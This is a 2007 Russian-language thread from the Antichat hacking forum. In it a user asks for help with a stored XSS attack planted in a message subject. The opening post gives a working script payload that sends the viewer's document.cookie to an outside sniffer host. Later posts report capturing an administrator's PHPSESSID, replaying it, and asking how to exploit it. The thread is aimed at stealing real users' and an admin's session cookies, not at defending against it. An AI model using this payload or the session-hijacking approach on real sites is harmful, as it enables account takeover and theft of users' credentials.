Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Подскажите (https://forum.antichat.xyz/showthread.php?t=48660)

Perec333 09.09.2007 17:30

Подскажите
 
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>

0nep@t0p 09.09.2007 18:40

Хм, наверное потому что пока только ты просмотрел эту тему

inlanger 09.09.2007 18:52

Цитата:

"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif

Perec333 09.09.2007 21:27

я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят

blackybr 10.09.2007 11:14

Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.

cardons 10.09.2007 11:22

Цитата:

Сообщение от Perec333
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят

А ты недумал что в некоторвх браузерах XSS непашет :)

Perec333 10.09.2007 15:43

Дык не на одном человеке проверял, у всех непохать не может))))

Perec333 10.09.2007 22:22

наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...


Время: 00:52